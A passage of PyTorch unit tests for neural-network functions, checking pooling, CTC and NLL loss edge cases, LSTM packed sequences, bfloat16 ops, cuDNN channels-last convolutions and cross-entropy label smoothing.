@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_pool_large_size(self, device, dtype):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
fn = getattr(F, fn_name)
# 16777217 is the smallest integer not expressible in float32
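# (float32 has a 24-bit significand: every integer up to 2**24 = 16777216 is
# exactly representable, but 2**24 + 1 rounds back to 2**24)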
x = torch.ones([1, 1, 16777217] + (num_dim - 1) * [1],
device=device, dtype=dtype)
res = fn(x, 1, stride=1, padding=0)
# check if the output shape was still computed correctly
self.assertEqual(x.shape[2], res.shape[2])
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_pool_invalid_size(self, device, dtype):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
if op == 'max':
# New implementation without indices supports empty tensors
# TODO(Heitor) change once with_indices code is updated
fn_name += '_with_indices'
fn = getattr(F, fn_name)
# use a configuration that yields a zero-sized output only if the
# floor division by the stride is performed correctly
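# With L_in = 4, kernel_size = 3, stride = 2, padding = 0, dilation = 2:
#   L_out = floor((4 + 2*0 - 2*(3 - 1) - 1) / 2 + 1) = floor(0.5) = 0,
# so a correct implementation must reject the zero-sized output.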
x = torch.ones([1, 1] + num_dim * [4],
device=device, dtype=dtype)
with self.assertRaisesRegex(RuntimeError, r"too small|smaller than"):
try:
res = fn(x, 3, stride=2, padding=0, dilation=2)
except TypeError:
# some implementations do not support dilation
res = fn(x, 6, stride=2, padding=0)
def test_CTCLoss_empty_target(self, device):
target_lengths = [0, 0, 0]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (0,), dtype=torch.long, device=device)
log_probs = torch.randn(50, 3, 15, dtype=torch.double, device=device).log_softmax(2)
loss = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
self.assertTrue((loss >= 0).all().item())
self.assertEqual(-log_probs.sum(0)[:, 0], loss)
target_lengths = [0, 9, 0]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (9,), dtype=torch.long, device=device)
log_probs = torch.randn(50, 3, 15, dtype=torch.double, device=device).log_softmax(2)
loss = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
self.assertTrue((loss >= 0).all().item())
self.assertEqual(-log_probs.sum(0)[[0, 2], 0], loss[[0, 2]])
def test_empty_dropout(self, device):
x = torch.tensor([]).to(device)
out = torch.nn.functional.dropout(x)
self.assertEqual(out.size(), x.size())
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@tf32_on_and_off(0.005)
def test_variable_sequence(self, device, dtype):
def pad(var, length):
if var.size(0) == length:
return var
return torch.cat([var, var.new_zeros(length - var.size(0), *var.size()[1:])])
def maybe_index_tuple(maybe_tuple_of_tensors, index):
if maybe_tuple_of_tensors is None:
return None
return tuple(maybe_tuple_of_tensors[j][:, index:index + 1, :].contiguous()
for j in range(2))
def check_lengths(lengths, enforce_sorted, use_default_hiddens, proj_size):
input_size = 3
hidden_size = 4
num_layers = 2
bidirectional = True
max_length = max(lengths)
x_leaf = torch.randn(max_length, len(lengths), input_size, device=device,
dtype=dtype, requires_grad=True)
num_directions = 2 if bidirectional else 1
lstm = nn.LSTM(input_size, hidden_size, bidirectional=bidirectional,
num_layers=num_layers, proj_size=proj_size).to(device, dtype)
lstm2 = deepcopy(lstm).to(device, dtype)
x = x_leaf
hidden0 = None
if not use_default_hiddens:
real_hidden_size = hidden_size if proj_size == 0 else proj_size
hidden0 = (torch.randn(num_directions * num_layers, len(lengths), real_hidden_size,
device=device, dtype=dtype),
torch.randn(num_directions * num_layers, len(lengths), hidden_size,
device=device, dtype=dtype))
# Compute sequences separately
seq_outs = []
seq_hiddens = []
for i, l in enumerate(lengths):
hidden_i = maybe_index_tuple(hidden0, i)
out, hid = lstm2(x[:l, i:i + 1], hidden_i)
out_pad = pad(out, max_length)
seq_outs.append(out_pad)
seq_hiddens.append(hid)
seq_out = torch.cat(seq_outs, 1)
seq_hidden = tuple(torch.cat(hids, 1) for hids in zip(*seq_hiddens))
# Use packed format
packed = rnn_utils.pack_padded_sequence(x, lengths, enforce_sorted=enforce_sorted)
packed_out, packed_hidden = lstm(packed, hidden0)
unpacked, unpacked_len = rnn_utils.pad_packed_sequence(packed_out)
# Check forward
prec = dtype2prec_DONTUSE[dtype]
self.assertEqual(packed_hidden, seq_hidden, atol=prec, rtol=0)
self.assertEqual(unpacked, seq_out, atol=prec, rtol=0)
self.assertEqual(unpacked_len, lengths, atol=prec, rtol=0)
# Check backward
seq_out.sum().backward()
grad_x = x_leaf.grad.data.clone()
x_leaf.grad.data.zero_()
unpacked.sum().backward()
self.assertEqual(x_leaf.grad, grad_x, atol=dtype2prec_DONTUSE[dtype], rtol=0)
for p1, p2 in zip(lstm.parameters(), lstm2.parameters()):
prec = dtype2prec_DONTUSE[dtype]
if dtype == torch.float16:
prec = 4e-2
self.assertEqual(p1.grad, p2.grad, atol=prec, rtol=0)
tests = [
# enforce_sorted, lengths
[True, [5]],
[False, [5]],
[True, [10, 10, 6, 2, 2, 1, 1]],
[False, [10, 10, 6, 2, 2, 1, 1]],
[False, [2, 1, 3, 2, 10, 5, 3]],
]
for enforce_sorted, seq_lens, in tests:
for use_default_hiddens in (True, False):
for proj_size in [0, 2]:
check_lengths(seq_lens, enforce_sorted, use_default_hiddens, proj_size)
def _test_batchnorm_update_stats(self, device, dtype=torch.float):
module = nn.BatchNorm1d(3).to(device, dtype)
data = torch.rand(4, 3, device=device, dtype=dtype)
# training pass
old_running_mean = module.running_mean.clone()
old_running_var = module.running_var.clone()
old_num_batches_tracked = module.num_batches_tracked.clone()
module(data)
self.assertNotEqual(old_running_mean, module.running_mean)
self.assertNotEqual(old_running_var, module.running_var)
self.assertEqual(old_num_batches_tracked + 1, module.num_batches_tracked)
# eval pass
module.eval()
old_running_mean = module.running_mean.clone()
old_running_var = module.running_var.clone()
old_num_batches_tracked = module.num_batches_tracked.clone()
module(data)
self.assertEqual(old_running_mean, module.running_mean)
self.assertEqual(old_running_var, module.running_var)
self.assertEqual(old_num_batches_tracked, module.num_batches_tracked)
def test_batchnorm_update_stats(self, device):
self._test_batchnorm_update_stats(device)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_update_stats(device)
def test_multi_margin_loss_errors(self, device):
self.assertRaises(RuntimeError,
lambda: nn.functional.multi_margin_loss(torch.randn(5, device=device),
torch.zeros(3, device=device)))
def _test_bfloat16_ops(self, op, device, inp_dims=(), prec=1e-2, scale_factor=None):
# fp32 compute
input1 = torch.randn(inp_dims, dtype=torch.float32, device=device, requires_grad=True)
if scale_factor is not None:
input1 = (torch.rand(inp_dims, dtype=torch.bfloat16, device=device) * scale_factor).float().requires_grad_()
out1 = op(input1)
grad_input1 = torch.randn_like(out1, device=device)
out1.backward(grad_input1)
# bfloat16 compute
op_bfp16 = op.bfloat16()
input2 = input1.detach().bfloat16().requires_grad_()
grad_input2 = grad_input1.bfloat16()
out2 = op_bfp16(input2)
out2.backward(grad_input2)
self.assertEqual(out1, out2, atol=prec, rtol=prec, exact_dtype=False)
self.assertEqual(input1.grad.data, input2.grad.data, atol=prec, rtol=prec, exact_dtype=False)
@onlyCUDA
def test_activations_bfloat16(self, device):
self._test_bfloat16_ops(torch.nn.ReLU(), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Threshold(0.1, 20), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.ELU(), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Softplus(), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Hardshrink(), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Softshrink(), device, inp_dims=(5,), prec=1e-2)
self._test_bfloat16_ops(torch.nn.LeakyReLU(), device, inp_dims=(5,), prec=1e-2)
@onlyCUDA
def test_pooling_bfloat16(self, device):
self._test_bfloat16_ops(torch.nn.AvgPool1d(3, stride=2), device, inp_dims=(8, 4, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AvgPool2d(3, stride=2), device, inp_dims=(8, 4, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AvgPool3d(3, stride=2), device, inp_dims=(8, 4, 16, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool1d(3), device, inp_dims=(8, 4, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool2d((3, 5)), device, inp_dims=(8, 4, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool3d((3, 5, 7)), device, inp_dims=(8, 4, 16, 16, 16), prec=0.05)
@onlyOnCPUAndCUDA
def test_softmax_bfloat16(self, device):
for dim in [0, 1, 2, 3]:
self._test_bfloat16_ops(torch.nn.Softmax(dim=dim), device, inp_dims=(16, 33, 15, 16), prec=1e-2)
# test softmax with large input values, which cause exp() to overflow
self._test_bfloat16_ops(torch.nn.Softmax(dim=dim), device, inp_dims=(16, 33, 15, 16), prec=0.05, scale_factor=1000.0)
@onlyCUDA
@skipCUDAIfRocmVersionLessThan((4, 3))
@skipCUDAIfNotMiopenSuggestNHWC
@skipCUDAIfCudnnVersionLessThan(7603)
@dtypes(torch.half, torch.float)
def test_conv_cudnn_nhwc(self, device, dtype):
def helper(n, c, h, w, out_channels, kernel_size, groups):
input = torch.randint(-3, 3, (n, c, h, w), dtype=dtype, device=device)\
.to(memory_format=torch.channels_last)
input.requires_grad_()
conv = nn.Conv2d(c, out_channels, kernel_size, groups=groups)\
.to(device='cuda', dtype=dtype, memory_format=torch.channels_last)
for p in conv.parameters():
p.data = torch.randint_like(p, -3, 3)
# use FP64 channels-first conv as reference
ref_input = input.detach().clone().contiguous().double().requires_grad_()
ref_conv = nn.Conv2d(c, out_channels, kernel_size, groups=groups)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
ref_conv.load_state_dict(conv.state_dict())
ref_conv = ref_conv.to(device='cuda', dtype=torch.double, memory_format=torch.contiguous_format)
out = conv(input)
ref_out = ref_conv(ref_input)
grad = torch.randint_like(out, -3, 3)
ref_grad = grad.detach().clone().double().contiguous()
out.backward(grad)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(input.grad.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(conv.weight.grad.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ref_input.grad.is_contiguous())
self.assertTrue(ref_conv.weight.grad.is_contiguous())
self.assertEqual(out, ref_out, exact_dtype=False)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad, exact_dtype=False)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad, exact_dtype=False)
self.assertEqual(input.grad, ref_input.grad, exact_dtype=False)
helper(2, 8, 4, 4, out_channels=4, kernel_size=3, groups=1)
helper(2, 8, 4, 4, out_channels=8, kernel_size=3, groups=8)
helper(1, 16, 56, 56, out_channels=16, kernel_size=3, groups=1)
helper(1, 16, 56, 56, out_channels=16, kernel_size=3, groups=16)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(8005)
@dtypes(torch.half, torch.float)
def test_conv_cudnn_ndhwc(self, device, dtype):
def helper(n, c, d, h, w, out_channels, kernel_size, groups):
input = torch.randint(-2, 2, (n, c, d, h, w), dtype=dtype, device=device)\
.to(memory_format=torch.channels_last_3d)
input.requires_grad_()
conv = nn.Conv3d(c, out_channels, kernel_size, groups=groups)\
.to(device='cuda', dtype=dtype, memory_format=torch.channels_last_3d)
for p in conv.parameters():
p.data = torch.randint_like(p, -2, 2)
# use FP64 channels-first conv as reference
ref_input = input.detach().clone().contiguous().double().requires_grad_()
ref_conv = nn.Conv3d(c, out_channels, kernel_size, groups=groups)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
ref_conv.load_state_dict(conv.state_dict())
ref_conv = ref_conv.to(device='cuda', dtype=torch.double, memory_format=torch.contiguous_format)
out = conv(input)
ref_out = ref_conv(ref_input)
grad = torch.randint_like(out, -2, 2)
ref_grad = grad.detach().clone().double().contiguous()
out.backward(grad)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(input.grad.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(conv.weight.grad.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ref_input.grad.is_contiguous())
self.assertTrue(ref_conv.weight.grad.is_contiguous())
self.assertEqual(out, ref_out, exact_dtype=False)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad, exact_dtype=False)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad, exact_dtype=False)
self.assertEqual(input.grad, ref_input.grad, exact_dtype=False)
helper(2, 8, 4, 4, 4, out_channels=4, kernel_size=3, groups=1)
helper(2, 8, 4, 4, 4, out_channels=8, kernel_size=3, groups=8)
helper(1, 16, 18, 18, 18, out_channels=16, kernel_size=3, groups=1)
helper(1, 16, 18, 18, 18, out_channels=16, kernel_size=3, groups=16)
def _run_conv(self, layer, device, inp, grad, ref_conv, ref_input, ref_out,
input_format, weight_format, grad_format, output_format):
conv = layer(inp.size(1), grad.size(1),
ref_conv.weight.size(2)).float().to(device)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
conv.load_state_dict(ref_conv.state_dict())
weight_data = conv.weight.detach().clone().contiguous(memory_format=weight_format)
conv.weight.data = weight_data.resize_(weight_data.size(), memory_format=weight_format)
input = inp.clone().contiguous(memory_format=input_format)
input.resize_(input.size(), memory_format=input_format)
input = input.requires_grad_()
grad = grad.contiguous(memory_format=grad_format)
grad.resize_(grad.size(), memory_format=grad_format)
out = conv(input)
out.backward(grad)
self.assertTrue(out.is_contiguous(memory_format=output_format))
self.assertEqual(out, ref_out)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
def _test_conv_cudnn_nhwc_nchw(self, layer, n, c, h, w, k, filter_size, device):
data = torch.randint(1, 10, (n, c, h, w), dtype=torch.float32, device=device)
ref_input = data.clone().contiguous().requires_grad_(True)
ref_conv = layer(c, k, filter_size).float().to(device)
ref_out = ref_conv(ref_input)
grad = torch.randint(1, 10, ref_out.size(), dtype=torch.float32, device="cuda")
ref_out.backward(grad)
for w_f in [torch.contiguous_format, torch.channels_last]:
for g_f in [torch.contiguous_format, torch.channels_last]:
for input_format in [torch.contiguous_format, torch.channels_last]:
output_format = torch.contiguous_format
# Older versions of CudNN have Channels Last support disabled
if torch.backends.cudnn.version() >= 7603:
if input_format == torch.channels_last:
output_format = torch.channels_last
# This is because we have N111 weight that cannot handle
# the ambiguous memory_format
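# (e.g. a weight of shape (K, 1, 1, 1) has identical strides under
# torch.contiguous_format and torch.channels_last, making the format ambiguous)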
if w_f == torch.channels_last:
if layer == nn.Conv2d and filter_size * c != 1:
output_format = torch.channels_last
if layer == nn.ConvTranspose2d and filter_size * k != 1:
output_format = torch.channels_last
self._run_conv(layer, device, data, grad, ref_conv, ref_input,
ref_out, input_format, w_f, g_f, output_format)
@onlyCUDA
@skipCUDAIfRocmVersionLessThan((4, 3))
@skipCUDAIfNotMiopenSuggestNHWC
@skipCUDAIfCudnnVersionLessThan(7603)
@tf32_on_and_off(0.05)
def test_conv_cudnn_mismatch_memory_format(self, device):
configs = [
[4, 2, 8, 8, 4, 2],
[4, 1, 8, 8, 4, 2],
[1, 1, 8, 8, 4, 2],
[4, 2, 2, 8, 4, 1],
[4, 2, 1, 8, 4, 1],
[4, 2, 8, 8, 4, 1],
[4, 1, 8, 8, 4, 1],
]
for n, c, h, w, k, filter_size in configs:
self._test_conv_cudnn_nhwc_nchw(nn.Conv2d, n, c, h, w, k, filter_size, device)
self._test_conv_cudnn_nhwc_nchw(nn.ConvTranspose2d, n, c, h, w, k, filter_size, device)
# torch.half is erroring out on Windows with CUDA 10.1 + cuDNN 7.6.4
# returning CUDNN_STATUS_BAD_PARAM
# Disabling that specific test for now [see issue # 33918]
@onlyCUDA
@skipCUDAIfNoCudnn
@dtypes(torch.float, torch.double)
def test_conv_cudnn_nhwc_support(self, device, dtype):
input = torch.randn((1, 16, 1, 1), dtype=dtype, device="cuda", requires_grad=True)
weight = torch.randn((8, 16, 3, 3), dtype=dtype, device="cuda", requires_grad=True)
weight = weight.to(memory_format=torch.channels_last)
o = torch.conv2d(input, weight, None, (2, 1), (1, 1), (1, 1), 1)
self.assertTrue(o.is_contiguous(memory_format=torch.channels_last))
o.sum().backward()
# Test that faster algorithms used for inference produce the same results
# Validates depthwise3x3 bug reported in https://github.com/pytorch/pytorch/issues/60176
@onlyCPU
@dtypes(torch.float)
def test_conv2d_no_grad(self, device, dtype):
for batch in [1, 2, 3]:
for groups in [1, 2, 4]:
input = torch.rand(batch, groups, 8, 8, dtype=dtype, device=device)
m = nn.Conv2d(groups, 8, kernel_size=(3, 3), groups=groups, dtype=dtype, device=device)
with torch.no_grad():
output_ng = m(input)
output = m(input)
self.assertEqual(output, output_ng, rtol=1e-2, atol=1e-5)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfNoCudnn
@dtypes(torch.float, torch.double, torch.float16)
def test_cudnn_convolution_relu(self, device, dtype):
for batch, groups, kernel_size, memory_format in product((1, 2, 3),
(1, 2, 4),
((1, 1), (3, 3)),
(torch.channels_last, torch.contiguous_format)):
inp = torch.rand(batch, groups, 8, 8, dtype=dtype, device=device)
w = torch.randn(8, groups, kernel_size[0], kernel_size[1], dtype=dtype, device=device)
conv2d_out = torch.conv2d(inp, w, None, (1, 1), (0, 0), (1, 1), 1)
inp = inp.to(memory_format=memory_format)
w = w.to(memory_format=memory_format)
cudnn_out = torch.cudnn_convolution_relu(inp, w, None, (1, 1), (0, 0), (1, 1), 1)
self.assertTrue(cudnn_out.is_contiguous(memory_format=memory_format))
self.assertEqual(conv2d_out.relu(), cudnn_out)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7603)
def test_convert_conv2d_weight_memory_format(self, device):
input = torch.randint(1, 10, (2, 8, 4, 4), dtype=torch.float32, device=device)
model = nn.Sequential(
nn.Conv2d(8, 4, 3),
nn.BatchNorm2d(4)).to(device).float()
for memory_format in [torch.channels_last, torch.contiguous_format]:
model = nn.utils.convert_conv2d_weight_memory_format(model, memory_format)
out = model(input)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
model = nn.Sequential(
nn.ConvTranspose2d(8, 4, 3),
nn.BatchNorm2d(4)).to(device).float()
for memory_format in [torch.channels_last, torch.contiguous_format]:
model = nn.utils.convert_conv2d_weight_memory_format(model, memory_format)
out = model(input)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
def test_nll_loss_mismatched_batch(self, device):
x = torch.randn((10, 3), requires_grad=True, device=device)
# t should have size (10,)
t = torch.zeros((3,), dtype=torch.int64, device=device)
with self.assertRaisesRegex(ValueError, 'Expected.*batch_size'):
F.nll_loss(x, t)
def test_nll_loss_out_of_bounds_ignore_index(self, device):
x = torch.randn(6, 3, requires_grad=True, device=device)
t = torch.tensor([0, 1, 255, 0, 1, 2], dtype=torch.int64, device=device)
for reduction in ['mean', 'none']:
F.nll_loss(x, t, ignore_index=255, reduction=reduction).sum().backward()
def test_nll_loss_invalid_target_dim(self, device):
x = torch.randn((10, 3), device=device)
t = torch.zeros((10, 2), dtype=torch.int64, device=device)
with self.assertRaisesRegex(RuntimeError, "1D target tensor expected"):
F.nll_loss(x, t)
def test_nll_loss_invalid_weights(self, device):
x = torch.randn((10, 3), device=device)
t = torch.empty(10, dtype=torch.int64, device=device).random_(0, 3)
invalid_weights = [
torch.randn(4, device=device),
torch.randn(1, 3, device=device),
]
msg = "weight tensor should be defined either for all 3 classes or no classes"
for weight in invalid_weights:
with self.assertRaisesRegex(RuntimeError, msg):
F.nll_loss(x, t, weight=weight)
def _nll_loss_helper(self, input_size, reduction, expected, device):
input = torch.rand(input_size, requires_grad=True, device=device)
num_channels = input_size[1]
target_size = (input_size[0], ) + tuple(input_size[2:])
target = torch.randint(num_channels, target_size, device=device)
output = F.nll_loss(input, target, reduction=reduction)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, expected)
output.sum().backward()
self.assertEqual(input.grad.size(), input.size())
def test_nll_loss_empty_tensor_reduction_none(self, device):
self._nll_loss_helper([0, 3], "none", torch.empty([0], device=device), device)
self._nll_loss_helper([0, 3, 5, 7], "none", torch.empty([0, 5, 7], device=device), device)
self._nll_loss_helper([2, 3, 0, 7], "none", torch.empty([2, 0, 7], device=device), device)
self._nll_loss_helper([2, 3, 5, 0], "none", torch.empty([2, 5, 0], device=device), device)
self._nll_loss_helper([2, 3, 5, 7, 0], "none", torch.empty([2, 5, 7, 0], device=device), device)
@unittest.skipIf(TEST_WITH_UBSAN, "division-by-zero error with UBSAN")
def test_nll_loss_empty_tensor_reduction_mean(self, device):
nan = torch.tensor(float('nan'), device=device)
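# 'mean' over an empty batch computes sum/count = 0/0, so the expected result is NaN.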
self._nll_loss_helper([0, 3], "mean", nan, device)
self._nll_loss_helper([0, 3, 5, 7], "mean", nan, device)
self._nll_loss_helper([2, 3, 0, 7], "mean", nan, device)
self._nll_loss_helper([2, 3, 5, 0], "mean", nan, device)
self._nll_loss_helper([2, 3, 5, 7, 0], "mean", nan, device)
def test_nll_loss_empty_tensor_reduction_sum(self, device):
zero = torch.tensor(0, device=device)
self._nll_loss_helper([0, 3], "sum", zero, device)
self._nll_loss_helper([0, 3, 5, 7], "sum", zero, device)
self._nll_loss_helper([2, 3, 0, 7], "sum", zero, device)
self._nll_loss_helper([2, 3, 5, 0], "sum", zero, device)
self._nll_loss_helper([2, 3, 5, 7, 0], "sum", zero, device)
def test_nll_loss_total_weight_is_zero(self, device):
def helper(input_size):
input = torch.ones(input_size, requires_grad=True, device=device)
num_channels = input_size[1]
target_size = (input_size[0], ) + tuple(input_size[2:])
target = torch.zeros(target_size, dtype=torch.long, device=device)
weight = torch.zeros([num_channels], device=device)
self.assertEqual(F.nll_loss(input, target, weight).item(), 0)
helper([2, 3])
helper([2, 3, 5, 7])
helper([2, 3, 5, 7, 9])
def test_nll_loss_byte_target_matches_long(self, device):
N, C = 10, 4
input = torch.randn(N, C, device=device, requires_grad=True)
target = torch.empty(N, dtype=torch.long, device=device).random_(0, C)
def compute_result_and_gradient(reduction, target_dtype):
input_ = input.detach()
input_.requires_grad_()
prob = F.log_softmax(input_, dim=-1)
loss = nn.NLLLoss(reduction=reduction)
result = loss(prob, target.to(target_dtype))
result.sum().backward()
return result, input_.grad
for reduction in ["none", "mean", "sum"]:
result_long, grad_long = compute_result_and_gradient(reduction, torch.long)
result_byte, grad_byte = compute_result_and_gradient(reduction, torch.uint8)
self.assertEqual(result_long, result_byte)
self.assertEqual(grad_long, grad_byte)
def test_cross_entropy_loss_prob_target_all_reductions(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
weight = torch.randn(C, device=device).abs()
for reduction, w in product(['none', 'mean', 'sum'], [None, weight]):
m = torch.nn.CrossEntropyLoss(weight=w, reduction=reduction)
output = m(input, target)
output_ref = loss_reference_fns['CrossEntropyLoss'](
input, target, reduction=reduction, weight=w)
self.assertEqual(output, output_ref)
def test_cross_entropy_loss_prob_target_unit_weights(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
for reduction in ['none', 'mean', 'sum']:
# Ensure result with unit weights is equivalent to result without weights.
m = torch.nn.CrossEntropyLoss(reduction=reduction)
unit_weight = torch.ones(C, device=device, dtype=target.dtype)
m_unit = torch.nn.CrossEntropyLoss(weight=unit_weight, reduction=reduction)
output = m(input, target)
output_unit = m_unit(input, target)
self.assertEqual(output, output_unit)
def test_cross_entropy_loss_index_target_unit_weights(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
for reduction in ['none', 'mean', 'sum']:
# Ensure result with unit weights is equivalent to result without weights.
m = torch.nn.CrossEntropyLoss(reduction=reduction)
unit_weight = torch.ones(C, device=device, dtype=input.dtype)
m_unit = torch.nn.CrossEntropyLoss(weight=unit_weight, reduction=reduction)
output = m(input, target)
output_unit = m_unit(input, target)
self.assertEqual(output, output_unit)
def test_cross_entropy_loss_one_hot_target(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
weight = torch.randn(C, device=device).abs()
# Get one-hot representation of the target.
target_one_hot = F.one_hot(target, num_classes=C).to(input.dtype)
# Need to put the C dim at index 1.
target_one_hot = target_one_hot.permute(0, -1, *range(1, target_one_hot.dim() - 1))
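# e.g. for k = 2, one_hot yields shape (N, d1, d2, C); permute(0, -1, 1, 2) moves C to index 1, giving (N, C, d1, d2).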
for reduction, w in product(['none', 'mean', 'sum'], [None, weight]):
# Skip this case for now because soft and hard label CE are not consistent
# in the way they apply class weights (see issue #61309).
if reduction == 'mean' and w is not None:
continue
# Ensure loss computed with class indices matches loss
# computed with one-hot class probs.
m = torch.nn.CrossEntropyLoss(weight=w, reduction=reduction)
output = m(input, target)
output_one_hot = m(input, target_one_hot)
self.assertEqual(output, output_one_hot)
def test_cross_entropy_label_smoothing_errors(self, device):
N, C = 3, 4
input_args = [
(torch.randn((N, C), device=device), torch.arange(0, C, device=device)),
(torch.randn((N, C), device=device), torch.randn(N, C, device=device))
]
for input_arg in input_args:
loss = nn.CrossEntropyLoss(label_smoothing=1.2)
with self.assertRaisesRegex(RuntimeError,
r"label_smoothing must be between 0\.0"):
loss(*input_arg)
def test_cross_entropy_label_smoothing_consistent_index_target_and_probs(self, device):
N, C = 10, 4
ks = range(5)
reductions = ['none', 'mean', 'sum']
label_smoothings = [0.05, 0.15]
for k, reduction, label_smoothing in product(ks, reductions, label_smoothings):
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
# construct a target probability distribution that should give the same result as label_smoothing
target_proba = F.one_hot(target, num_classes=C)
# Need to put the C dim at index 1.
target_proba = target_proba.permute(0, -1, *range(1, target_proba.dim() - 1))
target_mask = (target_proba == 1)
target_proba = target_proba.to(dtype=input.dtype)
# y_k^ls = y_k * (1 - label_smoothing) + label_smoothing / n_classes
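# e.g. with C = 4 and label_smoothing = 0.05, the true class gets
# 1 - 0.05 + 0.05/4 = 0.9625 and every other class gets 0.05/4 = 0.0125, summing to 1.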
# Apply the smoothing formula to the one-hot probabilities.
target_proba.masked_fill_(target_mask, 1 - label_smoothing + label_smoothing / C)
target_proba.masked_fill_(~target_mask, label_smoothing / C)
loss = nn.CrossEntropyLoss(reduction=reduction)
output_with_prob = loss(input, target_proba)
loss = nn.CrossEntropyLoss(
reduction=reduction, label_smoothing=label_smoothing)
output_with_index = loss(input, target)
self.assertEqual(output_with_prob, output_with_index,
rtol=1e-07, atol=1e-05)
def test_cross_entropy_label_smoothing_with_probs(self, device):
N, C = 10, 4
ks = range(5)
reductions = ['none', 'mean', 'sum']
label_smoothings = [0.05, 0.15]
# Test with k-dimensional loss.
for k, label_smoothing in product(ks, label_smoothings):
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = F.log_softmax(torch.randn(N, C, *other_dims, device=device), dim=1)
for reduction in reductions:
# use with label_smoothing
loss = nn.CrossEntropyLoss(reduction=reduction, label_smoothing=label_smoothing)
output_with_smoothing = loss(input, target)
# manually smoothing target
# class_proba^ls = class_proba * (1 - label_smoothing) +
# label_smoothing / n_classes
target_with_smoothing = target * (1 - label_smoothing) + label_smoothing / C
loss = nn.CrossEntropyLoss(reduction=reduction)
output_with_manual_smoothing = loss(input, target_with_smoothing)
self.assertEqual(output_with_smoothing, output_with_manual_smoothing)
def test_softshrink_negative(self, device):
input = torch.randn(5, device=device, requires_grad=True)
m = torch.nn.Softshrink(-1)
with self.assertRaisesRegex(RuntimeError,
r'lambda must be greater or equal to 0, but found to be -1\.'):
m(input)
def test_fold(self, device):
def test_dtype(fn, input, dtype):
input = input.detach().clone().to(dtype=dtype).requires_grad_(True)
input2 = input.detach().clone().float().requires_grad_(True)
out = fn(input)
out.sum().backward()
out2 = fn(input2)
out2.sum().backward()
self.assertEqual(out.dtype, dtype)
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(out, out2.to(dtype=dtype), atol=0.05, rtol=0)
self.assertEqual(input.grad, input2.grad.to(dtype=dtype))
def func(x):
return F.fold(x, output_size=(4, 5), kernel_size=(2, 2))
